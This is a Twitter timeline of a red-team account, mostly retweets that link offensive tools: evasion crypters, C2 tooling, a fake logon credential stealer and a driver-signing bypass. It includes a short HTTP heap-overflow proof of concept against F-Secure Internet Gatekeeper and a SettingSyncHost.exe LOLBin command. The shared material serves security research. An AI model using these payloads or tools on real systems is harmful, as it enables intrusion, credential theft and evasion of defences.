kmkz
@kmkz_security
Grevenmacher, Luxembourg
Redteam, offensive security and fun!
16,259 Tweets
1,179 Following
11,714 Followers

Tweets

kmkz retweeted
Andrew Chiles
@AndrewChiles
1 min
If you use the cs2modrewrite project to build your C2 redirector rules, it is now updated to support CS <=4.0 profiles (multi-variants). #specterops #redteam @joevest
github.com/threatexpress/…

kmkz retweeted
Francesco Soncina
@phraaaaaaa
Feb 4
x0rro — A PE/ELF/MachO Crypter for x86 and x86_64 Based on Radare2
Often AVs rely on simple signatures to detect malicious software and I needed a tool in order to confirm this behavior and be able to produce a working bypass. That’s why I wrote x0rro.
iwantmore.pizza/posts/x0rro.ht… pic.twitter.com/tqNVylQiNk

kmkz retweeted
Florian Hansemann
@CyberWarship
15 h
SpiderFoot, the most complete OSINT collection and reconnaissance tool
#infosec #pentest #OSINT #bugbounty
github.com/smicallef/spid… pic.twitter.com/Mdc1ITucJ2

kmkz retweeted
Dave Kennedy (ReL1K)
@HackingDave
19 h
Magic Unicorn v3.8.2 released. Changes DllImport functionality for signature bypasses.
github.com/trustedsec/uni…
#TrustedSec

kmkz retweeted
Sébastien Dudek
@FlUxIuS
Feb 4
Introduction to mobile network intrusion from a mobile phone:
medium.com/mobile-stacks-… by @Gallium24, @BuuriMa, Henri, @tmakkonen, @ad_ili_rai_en and myself.

kmkz retweeted
Tom Sellers
@TomSellers
Feb 4
You can find @wvuuuuuuuuuuuuu 's DOUBLEPULSAR over RDP blog post here:
blog.rapid7.com/2020/02/04/dou…

kmkz retweeted
Tom Sellers
@TomSellers
Feb 4
And his DOUBLEPULSAR over RDP #Metasploit module here:
github.com/rapid7/metaspl…

kmkz retweeted
RIPS Technologies
@ripstech
Jan 6
#Security #learning from "Drive By RCE Exploit in Pimcore 6.2.0":
👉 Check all execcalls(), there may be left overs bypassing sanitization.
Learn more -> rips.tech/pimcore pic.twitter.com/dSpNTz9n8Q

kmkz
@kmkz_security
Feb 4

kmkz retweeted
/r/netsec
@_r_netsec
Feb 4
Firefox Spidermonkey JS Engine Exploitation blog.infosectcbr.com.au/2020/01/firefo…

kmkz retweeted
Jin Wook Kim
@wugeej
Feb 4
[PoC] Heap Overflow in F-Secure Internet Gatekeeper
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
blog.doyensec.com/2020/02/03/hea…

kmkz retweeted
Ryan Hausknecht
@Haus3c
Feb 3
I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful. github.com/hausec/COMMeth…

kmkz retweeted
Marcello
@byt3bl33d3r
Feb 3
Really glad to finally get a blogpost out about this. Hopefully this is useful and gives Red Teamers ideas on how to use the BYOI concept in their own payloads. If anyone is interested in a few more follow up posts about this will gladly oblige :)
blackhillsinfosec.com/red-teamers-co…

kmkz retweeted
Henry Chen
@chybeta
Feb 3
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
djangoproject.com/weblog/2020/fe…
FIX: github.com/django/django/… pic.twitter.com/NljqLmin93

kmkz retweeted
Linus Henze
@LinusHenze
Feb 2
I’ve just uploaded my Jailbreak for the iPad Pro (2017) to GitHub. Right now, SSH and Sileo can be installed. Due to lack of devices, I cannot currently implement support for other devices. Feel free to create PRs if you would like to help me!
github.com/LinusHenze/Fugu

kmkz retweeted
InfoSect
@infosectcbr
Feb 2
Pointer Compression in V8 and what it means for browser exploitation by @farazsth98 blog.infosectcbr.com.au/2020/02/pointe…

kmkz retweeted
jack
@operat_or
Jan 25
Some notes on PoshC2, operational considerations + a couple of tweaks to default beacons which might reduce exposure to Blue team operat-or.gitbook.io/notes/poshc2-i…

kmkz retweeted
Arris Huijgen
@bitsadmin
Feb 1
#FakeLogonScreen is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with #CobaltStrike's execute-assembly command.
github.com/bitsadmin/fake… pic.twitter.com/2pAOk9InLM

kmkz retweeted
FireF0X
@hFireF0X
Feb 2
KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore, github.com/hfiref0x/KDU pic.twitter.com/s154qYlIKR

kmkz retweeted
Adam
@Hexacorn
Feb 2
SettingSyncHost.exe as a LolBin
hexacorn.com/blog/2020/02/0…
#LOLBIN
cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foo pic.twitter.com/dOM4EHq4Zu